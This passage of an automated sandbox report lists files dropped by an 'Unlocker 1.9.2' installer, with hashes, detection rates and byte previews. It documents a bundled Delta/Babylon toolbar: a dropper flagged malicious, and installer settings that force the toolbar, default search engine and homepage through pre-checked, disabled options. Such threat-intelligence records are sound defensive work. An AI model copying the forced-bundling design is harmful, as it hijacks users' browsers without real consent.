                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1898992
                                                                                                                                                            Entropy (8bit):5.743047590845145
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:knARLFkMxNcIs5WLDbZfGG98dhNmpejZCPiXnE2yYH0e8U07:BFkw7s5WcYkjZCwE2dH0e8UG
                                                                                                                                                            MD5:26F6D1B6756A83DE9755A05F7C030D75
                                                                                                                                                            SHA1:935F58155F74B051F9123B6022B7D358B52B146F
                                                                                                                                                            SHA-256:2ACAB7C986BBF80578C3BD998DD2D853257719CEB74C9D30BB4EA28952403D5B
                                                                                                                                                            SHA-512:AF9603572BDDB6244A7AB0484CB3AC9ED7C91B1CEA3E3F8C8886478930DBC102925B45ED094EAA2801755644E3BB4A4C0685A423F937F4B02AF16FEEC56E4F6F
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 23%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........U........................................w............<.......<..................#...................Rich............PE..L...O<.Q.....................N......vb............@........................................................................H...T....P.. ?..........................0...................................@............................................text...U........................... ..`.rdata..VR.......T..................@..@.data....1..........................@....rsrc... ?...P...@..................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\SetupStrings.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):91790
                                                                                                                                                            Entropy (8bit):7.9969876797429755
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:1536:YYMRZJnf4lTn61qnl4nJszUaFsQZFWT9a5wSFU/BTi5MjmMoa7OYCVumZJBE:YYgJmOs4nJwFRZFSa5vUoumaE8mZJBE
                                                                                                                                                            MD5:407846797C5BA247ABEB5FA7C0C0BA05
                                                                                                                                                            SHA1:44386455EED8E74D75E95E9E81E96A19F0B27884
                                                                                                                                                            SHA-256:0147B5B11B935310752666FCF1E6AFC922B76FF03D01A0D1EE2BABEAC10CA1E3
                                                                                                                                                            SHA-512:7399A9228F971698DB7362AAD28D3F9694C0BF453D4529E48BC7869AF0960452CFE1A5F0A5754E7D567D81B5AA1E35BE05A9E36EC745E5470D20FD44A61D20AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:C.e....x..k.\...D6v......}....R.cc.4m......d..c.;.2O..*3O..<%..{........X`C.....z Q..&:.;.g&J1..NL..V..L.D..wz.L...{.GV...q.#.*.>{...z|k...#K...G?...&.......f.^..7....F.ma.....,<.\ei.4...f....{...^'.&b.u.H...o........&.>4..o2..<}{8.{....t,=.b.N.`..T...i...:..n...p.w0LBo*....-....5..7.4..{...z..n.t+.5.4.._.v..L.........i.g...!.@..l..N)..........!=.s..`......L.@. 9s.z.L..a..o...Z....OWj.V.^.t...p.^....q.]..ye.{.4....n...7...f38.b7.[.t..o..?..../z..3G.Vi...T.....u.~~Y.>...b.?....4B`.-.+.m...(<.b..{3.d..~....c.N..n.Q.Vj...4.q...m.f.wq.[>....Nw..7...`a,-.Ga.....|..o......FS.?......w3....Cu.#>s...0........V.'.-X.8..%...J.["......&,....Jm...v..{..K.o.......O..t..?.....>w....7..._.....T...?`..._R.E.v...L.I.*./j....#....]Q....OH.J..+7.?7.)..X..+W.?=.6Y./.\1.O.^5.P4...~..I..~$h.bE._/.|...Q4.m.p..u.ho..o~St..4n.i.b...".......V.U../.....d=..K+W...o..+...t.....[ae[.....u......{.o..U..B.S?K*W...B..?..k...cc3.....o...d...............U#.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\bab033.tbinst.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):205
                                                                                                                                                            Entropy (8bit):4.9535990881965635
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SC2nnnPjnu5AqBQW1ALepBTY2EUHgLJpB1GHGDusAY75E8SlQkQGEie0GUGl:SDnPoPB/mLepBREUALJv1TX9EDKJ5sGl
                                                                                                                                                            MD5:90713AB7A74884CD36A5FB4CFCDECE8A
                                                                                                                                                            SHA1:7BB56D08FD69A98E543B923BD0A9156F92A9C473
                                                                                                                                                            SHA-256:BC40813F6D07DBC1A4D4C74363460D1AD6EE76275729DE4C4F10EC40D8CC46EB
                                                                                                                                                            SHA-512:639D68135FB54264F2E21081D6CA9FFE73A94035982F4A2D7133D6D402CDD3EF4A695EEB61AD173DC6D1B8167D1F5DF2BE61A972C96F07AC357ECEC887A0D191
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A>..................c.......e..HKEY_NONE........babtb1........8..babylonsig=0000ddc5393a3898d6fab33f1b7634f4cacf2f4dc9ddfcbcc1defbd0ce593049:0000d32e061a0029c5ccdae47322435ba6e55cac53459f5d334a8ccfc03203ca

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\bab091.norecovericon.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):174
                                                                                                                                                            Entropy (8bit):4.747151880874695
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L2lhgnnn/9HNhcGVUDTERd8oDFLSbhlVEHgUVwkdHYzHcLSTp43FQClB/YcYN:LChgnl8GVUDTERCoDt8V8PVwkFYqSVgE
                                                                                                                                                            MD5:4F6E1FDBEF102CDBD379FDAC550B9F48
                                                                                                                                                            SHA1:5DA6EE5B88A4040C80E5269E0CD2B0880B20659C
                                                                                                                                                            SHA-256:E58EA352C050E6353FB5B4FA32A97800298C1603489D3B47794509AF6C89EC4C
                                                                                                                                                            SHA-512:54EFC9BDE44F332932A97396E59ECA5B6EA1AC72F929CCFFA1BDAB96DC3AE8D61E126ADBD26D12D0BC83141CEE03B24AD2BADA411230C4708B7A9AE9C60AECBE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A...................j........<\...babylonsig=000073e9c01f6a45cc864dc02a0f7bf8bcabc4db855fc5bd7a04d0abc34be5df:0000050db25f8bdf7e3b9e906bf562b69d8997079c552e0c644fd006193bd428

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\bab148.spreg.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):249
                                                                                                                                                            Entropy (8bit):5.365979053267958
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:t8knqres54xUSIJY7rsNXVO5HzVUTA010HkiYKoYb7orHTMS:t8knqPCxUNYXsFcNzVUM0109Y6/ozTT
                                                                                                                                                            MD5:A4AF0A0C254B38F2F9EECBF0E00B08FE
                                                                                                                                                            SHA1:EF730BCE77699730DDA378DC444B997CE7CEEA7A
                                                                                                                                                            SHA-256:810E0E32D54B9E1557DA7CCF1CA9F6354814E90DADC6B4AF5E1CBDF87FAC925A
                                                                                                                                                            SHA-512:B74596E55E75413303559C135DB393A04D6FD6CBAB147A51AC2F46435F52B92B82868DE4E67917A7B388D82C672FA36B525B88E2EEFE7EC40695F028395DCD84
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A@i....................@YHKEY_CLASSES_ROOT\AppID\{BDB69379-802F-4eaf-B541-F8DE92DD98DB}\Instl\Data...........babylonsig=000100374627dcb412ef9c7f6e6383eb408216ef2e8c99cab4a28ea690db202a:00006cc208e02b54e138d1ec1b02ef66d0b7f8e02d0d3a2c12c6a72548b0fc07

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\bab187.wl.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):234
                                                                                                                                                            Entropy (8bit):5.1257718700950665
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:elm7gnnn7nlun8FxIEyLdKC1xZ1jPAUFA9EHANrQ3wV39VuVUjKGBTc6+HYXDwDe:fgn8n8zIxdK2HG7EgNEg39MmIYXUDQQU
                                                                                                                                                            MD5:6358860CD0C336C1F91F86BE701D77C4
                                                                                                                                                            SHA1:5DD38B818BF0860B4C5144BA670A759D4345E4EC
                                                                                                                                                            SHA-256:2ED42E3C958EB21352BAE4B00DB2FA5BE94149ABC64EEC93E5258B9C4A715457
                                                                                                                                                            SHA-512:7DF3B3E1487D3A65000B6208969F1E695815133C052F369BEB36877FE5C6F64D979AEFD030A193B04A5E46FB0D97A3CC06837AA381EFE6BC24A0C084C768DAC1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A@Z..............2........."search.babylon.com.......$www.claro-search.com...... .........9...babylonsig=000014b501afb12514e838be35fd24590f9f095658a0cdd234df33a6003ea621:0000627597f0acd7d524976ccd69bab0cb4198771d23d12f21d1af554430d7ef

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\bab307.sp_pop0.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):178
                                                                                                                                                            Entropy (8bit):4.797553801917334
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:PC2nnnxnzkS2gfE8JfizV3RT3d/7lkVVYQdyFE6MBvhShRO7H/bSGPX:62n+S2V8Vu3139lkVVYX+NB8ADT1PX
                                                                                                                                                            MD5:0B7BE9C4B72C2C5166BFD61CA5EBBFED
                                                                                                                                                            SHA1:AEA0AA4E8226C1B4EFCE92E909DA773744BAA6D4
                                                                                                                                                            SHA-256:673BF972D308BC6108360575608CF72F393413F2D3993489B06DA4A6EFC749BD
                                                                                                                                                            SHA-512:4DCD7EA01B05550ACB00B71E7E9FDD52A04FE1CC574655030DCAE94B87DAD86BFB7973ADF9185DE03BCACB100FFF758B1A2F928FCB951E2B31E320860A2226D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A#..............2.................b+..babylonsig=0000b7d47988ec9b6d29c69c2d65aa0453a80949ffe47b173bcbcbaf1664b37f:0000d475e18513509c850255a7e329dacbd702f4edee04be1371ccd95bc05742

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\bab456.TB_OldWay.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):174
                                                                                                                                                            Entropy (8bit):4.752125358171384
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L2lhgnnnShk1X3slFi0U6tgFnlHOW8O+NYXnbcE0aBSVXdE1TbSXQK:LChgnShklvkWFnd+2XbciSV0SXQK
                                                                                                                                                            MD5:7E72D256E34635D351092955D1F8516B
                                                                                                                                                            SHA1:7F240F8F4BD61AE59247D84D0EC85F5BC8729F36
                                                                                                                                                            SHA-256:39EB1667A67149B5D930E5408896027E3C3FC06282735E61CB8D85F5B38F587C
                                                                                                                                                            SHA-512:621EB4BF2864DB2FA0F861C233CED790124E9060C081948BEB7117F8C058A36ECCA23EE05CE2D6D42AF15533C050F648D276589682D91DFE699EBE871CC9AE8C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A..............................o|.babylonsig=0000f7ffd199a6d07f03f6b2b8764a34a26e4dc1ed5ba9a3d998872127314113:0000cb9730cf6e41158f8f209a78d8121f40b07026490a300c0a084fb724d516

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\sqlite3.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\DeltaTB.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):520234
                                                                                                                                                            Entropy (8bit):6.562174410690013
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:RgEF6lmEVKtkDCQ/kUrc7dBLhuKgrQCjBXPTnrKcCxcfKvrLJLqgx5YMk4HJ0yPF:GEEdkUrc7RuKcQCdGVtT0MkCwwV/Hn
                                                                                                                                                            MD5:0F66E8E2340569FB17E774DAC2010E31
                                                                                                                                                            SHA1:406BB6854E7384FF77C0B847BF2F24F3315874A3
                                                                                                                                                            SHA-256:DE818C832308B82C2FABD5D3D4339C489E6F4E9D32BB8152C0DCD8359392695F
                                                                                                                                                            SHA-512:39275DF6E210836286E62A95ACE7F66C7D2736A07B80F9B7E9BD2A716A6D074C79DEAE54E2D21505B74BAC63DF0328D6780A2129CDFDA93AEC1F75B523DA9E05
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h..K........... ...8.$...t...............@.....`.......................................... ......................`..,.......P...............................H!...................................................................................text....#.......$..................`..`.data...8....@.......(..............@....bss.........P...........................edata..,....`.......6..............@....idata..P............N..............@....reloc..H!......."...V..............@....stab...l............x.................B.stabstr...............................B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\DeltaTB.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):785904
                                                                                                                                                            Entropy (8bit):7.996461190547012
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:XSsZfDKTpv0aNjLDiIx56qQDtOZTIzOjAWe0YiZ2PADaRx6Zfuc//yTuXbdir7+:XSiGTpTLDxxwqQcqOj5eyHox6ZGmAuXr
                                                                                                                                                            MD5:EB2764885565B6C01CB32E5F51F213B3
                                                                                                                                                            SHA1:CC41CADBBD6BA6ED0BFDD17798B4C9F94D7955E0
                                                                                                                                                            SHA-256:D7146999FF94B3AE092F3213DDF0217615F1D38798393B66778D11AAE2B68EAF
                                                                                                                                                            SHA-512:AC88795B2E8260ACE9EB57D2A3FDC4AADB18E2CB0AFD780459F51D25F83B34F7033425DC712655E423EBA4E011FD2776F53463042F2C2D9DD427554C04CC840E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aJh.%+..%+..%+..,S..$+..,S..-+....}. +..%+..;+..,S..-+..,S..$+..Rich%+..........PE..L...Ri@Q.....................................@....@.......................... .......\....@.................................LB..<....`..(............................@...............................................@..x............................text....-.......................... ..`.rdata..L....@.......2..............@..@.data........P.......8..............@....rsrc...(....`.......:..............@..@.reloc..L...........................@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\History.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 4, database pages 36, 1st free page 10, free pages 1, cookie 0x29, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):147456
                                                                                                                                                            Entropy (8bit):0.47889536469736377
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:MHVdU+bb3HDsX0ctSOaDN6tOVjN9DLjGQLBE3u:YVK+H3HDi9GN6IVj3XBBE3u
                                                                                                                                                            MD5:D6648BE90F0B2A39C26D60D499E5EB03
                                                                                                                                                            SHA1:69D2F56BBA9264621C0779F5D74B356C3794AFF0
                                                                                                                                                            SHA-256:E26A78FA6C8A1C60B67536CCB9A620F69FF4588F50F7F3956E14E438C6E5F9D6
                                                                                                                                                            SHA-512:BEF8A8D7391D16444B6347C1F2E07037EE1DF67652910551133919EF59F44C94636971BF602D93087D628A6E38DDF0929CF4C824994B35E6C2376B0B55AD4974
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......$...........)......................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsv5446.tmp\Delta.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:Generic INItialization configuration [Field 1]
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2010
                                                                                                                                                            Entropy (8bit):5.346412823747478
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:51ObX/Yfq9P9/T4KIQfgjQonfzDnDopg1TSpnmXdXdiRRwXTEV/MdWnrr8Xs:20KJc1Q4UonfzDnlTGnmegQVkdWE8
                                                                                                                                                            MD5:54679821D7899828769A563C999E71A3
                                                                                                                                                            SHA1:4B81B64545A824DE4702296FE816F4138FB58F22
                                                                                                                                                            SHA-256:0E82D51C269946CA6AC4C567CFCFEBF4E59282BF306ACE831B789EF5EBA28AE6
                                                                                                                                                            SHA-512:11E6C40E1484686CDBAC87ACCF6DE2429A8BC6CF6A33ADE7D606EDE6A45EF8D787E798621ED011656DE1221383E49D06DB8CBC78C3C2432DD4232B9589D731EC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[Settings]..NumFields=13..RTL=0..State=0....[Field 1]..Type=RadioButton..Text=Quick (Recommended)..Left=50..Right=280..Top=0..Bottom=8..Flags=NOTABSTOP|NOTIFY..State=1..HWND=262172....[Field 2]..Type=Bitmap..Text=C:\Users\user\AppData\Local\Temp\nsv5446.tmp\delta_logo_small.bmp..Left=0..Right=35..Top=0..Bottom=135..Flags=NOTABSTOP..HWND=1179738....[Field 3]..Type=checkbox..Text=Install Delta toolbar..Left=62..Right=-10..Top=76..Bottom=84..State=1..Flags=DISABLED..HWND=1769526....[Field 4]..Type=checkbox..Text=Make Delta my default search engine..Left=72..Right=-10..Top=88..Bottom=96..State=1..Flags=DISABLED..HWND=66532....[Field 5]..Type=checkbox..Text=Make Delta my default homepage and new tab..Left=72..Right=-10..Top=100..Bottom=108..State=1..Flags=DISABLED..HWND=66534....[Field 6]..Type=label..Text=By clicking next you accept the..Left=50..Right=149..Top=130..Bottom=138..Flags=NOTABSTOP..HWND=66536....[Field 7]..Type=Link..Text=legal terms..Left=150..Right=186..Top=130..Bottom=138.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsv5446.tmp\InstallOptions.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14848
                                                                                                                                                            Entropy (8bit):5.550299117674118
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:86d+dHXLHQOPiY53uiUdigyU+WsPdc/A1A+2jwK72dwF7dBEnbok:86UdHXcIiY535zBt2jw+BEnbo
                                                                                                                                                            MD5:325B008AEC81E5AAA57096F05D4212B5
                                                                                                                                                            SHA1:27A2D89747A20305B6518438EFF5B9F57F7DF5C3
                                                                                                                                                            SHA-256:C9CD5C9609E70005926AE5171726A4142FFBCCCC771D307EFCD195DAFC1E6B4B
                                                                                                                                                            SHA-512:18362B3AEE529A27E85CC087627ECF6E2D21196D725F499C4A185CB3A380999F43FF1833A8EBEC3F5BA1D3A113EF83185770E663854121F2D8B885790115AFDF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.p..q.,.q.,.q.,.q.,@q.,.~C,.q.,\R.,.q.,\R/,.q.,.w.,.q.,.Q.,.q.,Rich.q.,........................PE..L......K...........!.........<.......).......0.......................................................................8..p...81.......p..........................@....................................................0..8............................text...@........................... ..`.rdata.......0....... ..............@..@.data... (...@.......*..............@....rsrc........p.......2..............@..@.reloc...............4..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsv5446.tmp\LangDLL.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5632
                                                                                                                                                            Entropy (8bit):3.951555564830228
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:iV6pAvmNC6iMPUptxEZK65x/AmvycNSmwVsOYJyvrpXptp/JvR0Jlof5d2:2811GED5ZTvycNSmwVsTJuftpZR0Sd2
                                                                                                                                                            MD5:9384F4007C492D4FA040924F31C00166
                                                                                                                                                            SHA1:ABA37FAEF30D7C445584C688A0B5638F5DB31C7B
                                                                                                                                                            SHA-256:60A964095AF1BE79F6A99B22212FEFE2D16F5A0AFD7E707D14394E4143E3F4F5
                                                                                                                                                            SHA-512:68F158887E24302673227ADFFC688FD3EDABF097D7F5410F983E06C6B9C7344CA1D8A45C7FA05553ADCC5987993DF3A298763477168D4842E554C4EB93B9AAAF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................~..........z.....B....Rich..........PE..L......K...........!......................... ...............................`......................................p"..I...` ..P....@..`....................P....................................................... ..`............................text...l........................... ..`.rdata....... ......................@..@.data...l....0......................@....rsrc...`....@......................@..@.reloc..@....P......................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsv5446.tmp\System.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11264
                                                                                                                                                            Entropy (8bit):5.568877095847681
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:7DKnJZCv6VmbJQC+tFiUdK7ckD4gRXKQx+LQ2CSF:7ViJrtFRdbmXK8+PCw
                                                                                                                                                            MD5:C17103AE9072A06DA581DEC998343FC1
                                                                                                                                                            SHA1:B72148C6BDFAADA8B8C3F950E610EE7CF1DA1F8D
                                                                                                                                                            SHA-256:DC58D8AD81CACB0C1ED72E33BFF8F23EA40B5252B5BB55D393A0903E6819AE2F
                                                                                                                                                            SHA-512:D32A71AAEF18E993F28096D536E41C4D016850721B31171513CE28BBD805A54FD290B7C3E9D935F72E676A1ACFB4F0DCC89D95040A0DD29F2B6975855C18986F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L......K...........!................0).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text...1........................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsv5446.tmp\delta_logo_small.bmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 50 x 46 x 32, resolution 5905 x 5905 px/m, cbSize 9254, bits offset 54
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):9275
                                                                                                                                                            Entropy (8bit):5.943259792257716
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:NFwO6xAA7skBZgZIY1nIcg9tmZ0Hcy7y5q7WvbVZE8qObUO5wG3:6JYOqIhP9tmZ0Hcy7y5q7WvbUs3
                                                                                                                                                            MD5:2786F736B7A2022A9117FA8CDDF7269B
                                                                                                                                                            SHA1:FEEFBA3044896EABE63545DF3FC50056C7663002
                                                                                                                                                            SHA-256:C92E8E901C8FF0B2384840200D2A22A9FD357F6A3D8784E5DA6F93CD863D3CAD
                                                                                                                                                            SHA-512:F9160AD0D4B429250BD7B0701CEAB4E7AAA643BB478309B7F684C12BA6EC3FB6F9F50141A347302314923929D74E9F5C1A6F2672F0056B0801215CDD64A030EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:BM&$......6...(...2......... ........................................................................................._..<..&.r...Z...I.x...............................................v....}...u.Z..........................................................................................................3.|.%....O..L...U...`...k...u..j.{.....................................S..9...)....|...y...|................................................................................................m...H.j..B...9...F...R...]...h...q...{.....................................m...Z...F...4...%.....}...x...s...u.......................................................................................,R7.."...5...A...M...X...d...q...c...M..RK/.T7$.B...<...=...>...B ..|...........l...T...?.../.....~...z...w...s...m.?.............................................................................."6'..".......:...F...S...Z...L..1...;...=...@...C...E...G...H...J"......................h...O...;...).....

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsv5446.tmp\ioSpecial.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:Generic INItialization configuration [Field 1]
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):559
                                                                                                                                                            Entropy (8bit):5.39665167623721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:lOuf9VTsAgQRvAYfUhc64gNhBLfz4gNDHFl8s3Ny:1TdRvAYfUhj1Jz1ZHF1c
                                                                                                                                                            MD5:31C1A4EDAB5060EF502AB8056AAC8CDD
                                                                                                                                                            SHA1:7836E5B34BFC93A10D6741361E8834A1FAB5C241
                                                                                                                                                            SHA-256:02E0849DE47863304467BF458C7773D237DD3444DF68F12469C24E9C4135833F
                                                                                                                                                            SHA-512:DD1054EC85B88B8CF8BFF0F61525BD3F80CC938FA8FE53BE0E7B21EA341813A234BD44D261CB2171D53D8D18C0D2EFB1110ACAB92D0701A088212F27C9680A85
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[Settings]..Rect=1044..NumFields=3..RTL=0..NextButtonText=&Finish..CancelEnabled=..State=0..[Field 1]..Type=bitmap..Left=0..Right=109..Top=0..Bottom=193..Flags=RESIZETOFIT..Text=C:\Users\user\AppData\Local\Temp\nsv5446.tmp\modern-wizard.bmp..HWND=1048652..[Field 2]..Type=label..Left=120..Right=315..Top=10..Text=Completing the Unlocker 1.9.2 Setup Wizard..Bottom=38..HWND=589944..[Field 3]..Type=label..Left=120..Right=315..Top=45..Bottom=185..Text=Unlocker 1.9.2 has been installed on your computer.\r\n\r\nClick Finish to close this wizard...HWND=983616..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsv5446.tmp\modern-wizard.bmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\Unlocker1.9.2.exe
                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 164 x 314 x 4, image size 26376, resolution 2834 x 2834 px/m, cbSize 26494, bits offset 118
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26494
                                                                                                                                                            Entropy (8bit):1.9568109962493656
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Qwika6aSaaDaVYoG6abuJsnZs5GhI11BayNXPcDrSsUWcSphsWwlEWqCl6aHAX2x:Qoi47a5G8SddzKFIcsOz3Xz
                                                                                                                                                            MD5:CBE40FD2B1EC96DAEDC65DA172D90022
                                                                                                                                                            SHA1:366C216220AA4329DFF6C485FD0E9B0F4F0A7944
                                                                                                                                                            SHA-256:3AD2DC318056D0A2024AF1804EA741146CFC18CC404649A44610CBF8B2056CF2
                                                                                                                                                            SHA-512:62990CB16E37B6B4EFF6AB03571C3A82DCAA21A1D393C3CB01D81F62287777FB0B4B27F8852B5FA71BC975FEAB5BAA486D33F2C58660210E115DE7E2BD34EA63
                                                                                                                                                            Malicious:false
